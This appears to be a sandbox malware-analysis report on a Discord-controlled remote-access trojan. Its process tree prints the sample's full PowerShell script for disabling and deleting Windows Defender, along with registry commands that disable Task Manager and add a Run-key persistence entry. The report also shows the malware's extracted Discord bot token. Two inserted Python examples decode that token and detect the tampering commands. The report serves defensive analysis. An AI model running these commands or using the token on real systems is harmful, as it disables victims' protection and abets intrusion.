Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    11/10/2024, 22:08 UTC

General

  • Target

    2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe

  • Size

    663KB

  • MD5

    043e699dbf3d88b6cca5fbe64229ba27

  • SHA1

    50661d32315985eab2a70f1d1f6435b9563ca237

  • SHA256

    2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747

  • SHA512

    04f23cfa08684ce109685bf2068211731018a85bb588cff9de67faca8ecc6e3e02b150a656f91b55557e5f4a949400f90da19f8c37f5abfac034e68e4cc633c2

  • SSDEEP

    6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJM1tc2uQNQ5rHbIOohWy0f:3BdlwHRn+WlYV+Rp2yEM1tc2uYXOos

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIwNzY2MzY3MDU0MTE2MDUwOQ.Gd6pNB.ScrscETWuXpifr43j4YDLQN_-m1c2UlONmnRmo

  • server_id

    1097447165732868126
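The token and server ID above can be triaged offline. The following is an added example, not code from this report or from the malware: it decodes the token's three dot-separated base64url segments (account ID, issue timestamp, HMAC) and the creation time carried in any Discord snowflake, and derives a shareable fingerprint so the secret itself never has to appear in an IOC feed. The segment layout and the 2011-01-01 timestamp epoch are assumptions taken from public token-format writeups, not from this page; the 2015-01-01 snowflake epoch is Discord's documented one. Nothing here contacts Discord.

```python
"""Added example (not from the sandbox report): decode the structure of the
extracted Discord bot token and the server snowflake offline, without ever
presenting the token to Discord. Assumption (from public token-format writeups,
not from this report): a token is three dot-separated base64url segments,
base64(account ID) . base64(big-endian seconds since 2011-01-01) . HMAC."""
import base64
import hashlib
from datetime import datetime, timezone

DISCORD_SNOWFLAKE_EPOCH_MS = 1_420_070_400_000  # 2015-01-01T00:00:00Z (Discord docs)
TOKEN_TIMESTAMP_EPOCH = 1_293_840_000           # 2011-01-01T00:00:00Z (assumption, see above)

# Values taken from the Malware Config section of this report.
EXTRACTED_TOKEN = "MTIwNzY2MzY3MDU0MTE2MDUwOQ.Gd6pNB.ScrscETWuXpifr43j4YDLQN_-m1c2UlONmnRmo"
EXTRACTED_SERVER_ID = 1097447165732868126


def _b64url(segment: str) -> bytes:
    """Token segments drop base64 padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def snowflake_created(snowflake: int) -> datetime:
    """Creation time encoded in the top 42 bits of any Discord snowflake ID."""
    ms = (snowflake >> 22) + DISCORD_SNOWFLAKE_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def parse_discord_token(token: str) -> dict:
    """Return the account ID, its creation time and the token issue time."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected <id>.<timestamp>.<hmac>")
    id_seg, ts_seg, hmac_seg = parts
    account_id = int(_b64url(id_seg).decode("ascii"))
    issued = int.from_bytes(_b64url(ts_seg), "big") + TOKEN_TIMESTAMP_EPOCH
    return {
        "account_id": account_id,
        "account_created": snowflake_created(account_id),
        "token_issued": datetime.fromtimestamp(issued, tz=timezone.utc),
        "hmac_chars": len(hmac_seg),
    }


def token_fingerprint(token: str) -> str:
    """Shareable IOC for the token itself: a truncated SHA-256, never the secret."""
    return hashlib.sha256(token.encode()).hexdigest()[:16]


if __name__ == "__main__":
    info = parse_discord_token(EXTRACTED_TOKEN)
    print(f"bot account {info['account_id']} created {info['account_created']:%Y-%m-%d}, "
          f"token issued {info['token_issued']:%Y-%m-%d %H:%M:%S}Z, "
          f"fingerprint {token_fingerprint(EXTRACTED_TOKEN)}")
    print(f"C2 guild {EXTRACTED_SERVER_ID} created {snowflake_created(EXTRACTED_SERVER_ID):%Y-%m-%d}")
```

The account ID is the bot to report to Discord for revocation; the two dates place the bot and its guild relative to the submission time and tell you whether the token was regenerated recently. Do not use the token to authenticate, and circulate the fingerprint rather than the token when sharing the IOC.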

Signatures

  • Contains code to disable Windows Defender (3 IoCs)

    A .NET executable that disables Windows Defender capabilities such as real-time monitoring and block-at-first-seen.

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Modifies security service (2 TTPs, 5 IoCs)
  • Disables Task Manager via registry modification
  • Executes dropped EXE (3 IoCs)
  • Loads dropped DLL (14 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Indicator Removal: File Deletion (1 TTP)

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery (1 TTP, 9 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (59 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
    "C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat" "
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
        bang_executor.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2616 -s 596
          4⤵
          • Loads dropped DLL
          PID:2808
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe
        executer.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
          4⤵
            PID:2564
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ep bypass .\test.ps1;
              5⤵
              • Modifies security service
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K instaling.bat
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2536
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K mgr.bat
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2872
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K microsoft.bat
          3⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
            4⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:2780
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2992 -s 600
              5⤵
              • Loads dropped DLL
              PID:2588
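The process tree above is a compact Defender-evasion, lockout and persistence chain: cmd.exe echoes a Set-MpPreference / Set-ItemProperty / Remove-Item script into test.ps1, PowerShell runs it with -ep bypass, and reg.exe sets DisableTaskMgr, NoControlPanel, NoDispAppearancePage and a Run key for bang_executor.exe. The following is an added example, not code from the report, the sandbox or the malware: Python that turns such command lines into structured findings, so the same checks can run over Sysmon Event ID 1 or Security 4688 CommandLine fields. The sample events are constructed from this page (the PowerShell script is abridged); PID 4242 and its Contoso key are a constructed benign control.

```python
"""Added example (not from the sandbox report): pull the Defender-tampering,
user-lockout and persistence indicators out of process command lines such as
the ones in the process tree above. Sample events are constructed from this
report (abridged); PID 4242 is a constructed benign control."""
import re
from dataclasses import dataclass, field

# Set-MpPreference -Disable* switches, Add-MpPreference exclusions and
# *ThreatDefaultAction Allow weaken Defender without stopping its service.
MP_DISABLE_RE = re.compile(r"Set-MpPreference\s+-(Disable\w+)\s+(?:1|\$true)\b", re.I)
MP_EXCLUSION_RE = re.compile(r'Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+"?([^"\s;]+)"?', re.I)
MP_ALLOW_RE = re.compile(r"-(Low|Moderate|High|Severe)ThreatDefaultAction\s+Allow\b", re.I)
# Start=4 (SERVICE_DISABLED) on, or deletion of, a Defender service key; tamper/antispyware policy writes.
SVC_START_RE = re.compile(r'Services\\(\w+)"?\s+-Name\s+Start\s+-Value\s+4\b', re.I)
SVC_DELETE_RE = re.compile(r'Remove-Item[^;]*?Services\\(\w+)"?', re.I)
POLICY_RE = re.compile(r"-Name\s+(TamperProtection\s+-Value\s+4|DisableAntiSpyware\s+-Value\s+1)\b", re.I)
EP_BYPASS_RE = re.compile(r"powershell(?:\.exe)?\s.*?-e\w*\s+bypass\b", re.I)
REG_ADD_RE = re.compile(r'reg(?:\.exe)?\s+add\s+"?(HK[^"]+?)"?\s+/v\s+(\w+)\s+/t\s+\w+\s+/d\s+"?([^"]*?)"?\s+/f', re.I)

DEFENDER_SERVICES = {"windefend", "wdnissvc", "sense", "wdnisdrv", "wdfilter", "wdboot"}
LOCKOUT_POLICIES = {"disabletaskmgr", "nocontrolpanel", "nodispappearancepage"}
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")

@dataclass
class Findings:
    disabled_switches: set = field(default_factory=set)
    exclusions: list = field(default_factory=list)
    allowed_threat_levels: set = field(default_factory=set)
    services_disabled: set = field(default_factory=set)
    services_deleted: set = field(default_factory=set)
    policy_writes: set = field(default_factory=set)
    ep_bypass: bool = False
    lockout_policies: set = field(default_factory=set)
    run_keys: list = field(default_factory=list)
    flagged_pids: list = field(default_factory=list)

    def verdict(self) -> str:
        if self.services_disabled or self.services_deleted or self.policy_writes:
            return "critical: Defender service or policy tampering"
        if self.disabled_switches or self.exclusions or self.allowed_threat_levels:
            return "high: Defender configuration weakened"
        if self.run_keys or self.lockout_policies or self.ep_bypass:
            return "medium: persistence, user lockout or execution-policy bypass"
        return "none"

def scan(pid: str, cmd: str, f: Findings) -> bool:
    """Fold one command line into f; return True if it contributed an indicator."""
    hit = False
    for sw in MP_DISABLE_RE.findall(cmd):
        f.disabled_switches.add(sw); hit = True
    for kind, value in MP_EXCLUSION_RE.findall(cmd):
        f.exclusions.append((kind, value)); hit = True
    for level in MP_ALLOW_RE.findall(cmd):
        f.allowed_threat_levels.add(level); hit = True
    for svc in SVC_START_RE.findall(cmd):
        if svc.lower() in DEFENDER_SERVICES:
            f.services_disabled.add(svc.lower()); hit = True
    for svc in SVC_DELETE_RE.findall(cmd):
        if svc.lower() in DEFENDER_SERVICES:
            f.services_deleted.add(svc.lower()); hit = True
    for write in POLICY_RE.findall(cmd):
        f.policy_writes.add(write.split()[0]); hit = True
    if EP_BYPASS_RE.search(cmd):
        f.ep_bypass = hit = True
    for key, name, data in REG_ADD_RE.findall(cmd):
        key = key.lower()
        if name.lower() in LOCKOUT_POLICIES and "\\policies\\" in key and data == "1":
            f.lockout_policies.add(name); hit = True
        elif key.endswith(RUN_KEYS):
            f.run_keys.append((name, data)); hit = True
    if hit: f.flagged_pids.append(pid)
    return hit

def analyze(events) -> Findings:
    """events: iterable of (pid, command line) pairs from a process tree or EDR export."""
    f = Findings()
    for pid, cmd in events:
        scan(pid, cmd, f)
    return f

SAMPLE_PS1 = (  # the script echoed by PID 2564, abridged to one statement per tactic
    r'Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; '
    r'Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; '
    r'Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; '
    r'Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; '
    r'Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; '
    r'Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; '
    r'Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; '
    r'Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; '
    r'Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"'
)
SAMPLE_EVENTS = [  # (pid, command line), constructed from the process tree above
    ("2564", r'"C:\Windows\system32\cmd.exe" /C echo ' + SAMPLE_PS1 + " > test.ps1"),
    ("2996", r'"C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;'),
    ("2488", r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    ("2780", r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f'),
    ("4242", r'reg add "HKCU\Software\Contoso\Example" /v Version /t REG_SZ /d "1.0" /f'),  # benign control
]
```

Running analyze(SAMPLE_EVENTS) flags PIDs 2564, 2996, 2488 and 2780 and returns the critical verdict on the strength of the WinDefend service-key writes alone. Two caveats: the command line is only one side of the telemetry, so pair this with Sysmon Event ID 13 on the Services\WinDefend and Policies\Microsoft\Windows Defender keys and with Defender Operational event 5007 (configuration changed); and the Windows 7 image used here ships no Defender PowerShell module, so the Set-MpPreference calls are swallowed by -ErrorAction SilentlyContinue while the Set-ItemProperty writes are what the "Modifies security service" signature on PID 2324 records. On Windows 10/11 with tamper protection enabled, those service-key and policy writes, and the TamperProtection=4 value the script tries to set, are blocked.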

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat

      Filesize

      121B

      MD5

      140d432dacc3a675f31bfc80171fc928

      SHA1

      6b886ca57fc64d079f943fae06210d41341b33b2

      SHA256

      dcb23167ac8eccdb760afc56b99ef4019cbcf9dbcdf1174f2040b361f3b4f534

      SHA512

      b925bec48d68ec12e6829e07c6d45b313505164d60444dd556f3f6e1739bdb4192e1c2a7d1f14f53c8c77086e49ab9f419df11e9b6c054906d05d5c38ba4cf6a

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe

      Filesize

      343KB

      MD5

      e1ead094e52097b884389a8064b15e2b

      SHA1

      894f8db63a8f41f913a5f5c69d1199ec8ae3f213

      SHA256

      82c67ed82a7a319c0ae30f92c187ea0150ac6ba6ef63d2d3b4fc999bb01d064f

      SHA512

      96bf368c771bbc9db1a23b8e57906530936372aa15c963ef370ef47a13328fc67201d4d184911679536ce952869a4bc2abdc42403e1978028c57c27b154ecea6

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe

      Filesize

      274KB

      MD5

      88e22186f196cc0e1e2d500eeac57337

      SHA1

      e5e0bd98f08de159880b58e918959c358efca6b1

      SHA256

      5dca36ce98da2185693a87305811cf7aeee7b3279298345e4d1f4d37efe0250b

      SHA512

      462fe680ba12da5fedec11d88ea17f9f65b80ee916f665d6208d9dcf3d3494c805d11aaf899914f621835b0a61d014000243fe01b2e00ca34681afc415a33ee6

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\instaling.bat

      Filesize

      269B

      MD5

      7e86beb4c1ebeb8ab77f1d68f14fec37

      SHA1

      c9a40241b2407d9492c41bcd70686d6fd829f3bc

      SHA256

      5a60b3cc91782e0a7c8cd52701e603299b62c87c0b593d5ac85ebce74321f2f3

      SHA512

      653ce9cbcf427be11042340859f61cfa30105332acad13b94e2d509960ba04d67610276b6a7128d56aa139098b0c1c8d67973fff7a97976acfb33d474073d849

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\mgr.bat

      Filesize

      111B

      MD5

      9a4a032d9a604c9b7c1e843c6455140e

      SHA1

      dbe7a610e1697e62722efb59ad3bc03afcfd900f

      SHA256

      dc0890d3d4a7370ece704eb075c05418795c47332dffcc277896e806c38c3db0

      SHA512

      ca045ec576eb55c442959c2709148392fe53f1613b6c5dc9cb5b43592d77563479233c7dee6e0832e5a95528e1653ba6b73c73a3dc4ed841a7529e6344eccb3c

    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat

      Filesize

      288B

      MD5

      77c6969c2641f3c5d6ed44a4feb48f25

      SHA1

      9ff375b96cd38ca40a9694698e9aa3be1fc1d52e

      SHA256

      33dbedbe9fb27de7c1f75d742e3992675c4d683073538b02a8d69922f366cd6a

      SHA512

      530f05816854791916b3409161a1e488d661e02340c4ae7b442ede31f7b21f70a6b5cfd5d1b330ddd202e104b5f4219253c537d32770e0fddf0640d178eefa68

    • C:\test.ps1

      Filesize

      3KB

      MD5

      3499745c76f31429c42a3b34d8cc0af6

      SHA1

      f9125070406cc2a2a6cf092f3ed3d36751107224

      SHA256

      3c2eb503e7d32f48b06199e6c1c350e559c316fd9f6f17f040e41079f44fb6e3

      SHA512

      1757ee5f42a8681e84ce3070d7ee164107ebc284bc0eb5424a4e71fe71e122eeadb28d63535d88557c0c49c687ce4514e8d387781ec7c68e1171994183dde1fb

    • memory/2324-46-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2324-47-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB

    • memory/2616-39-0x000000013FD20000-0x000000013FD7A000-memory.dmp

      Filesize

      360KB

    • memory/2704-40-0x00000000002E0000-0x000000000032A000-memory.dmp

      Filesize

      296KB
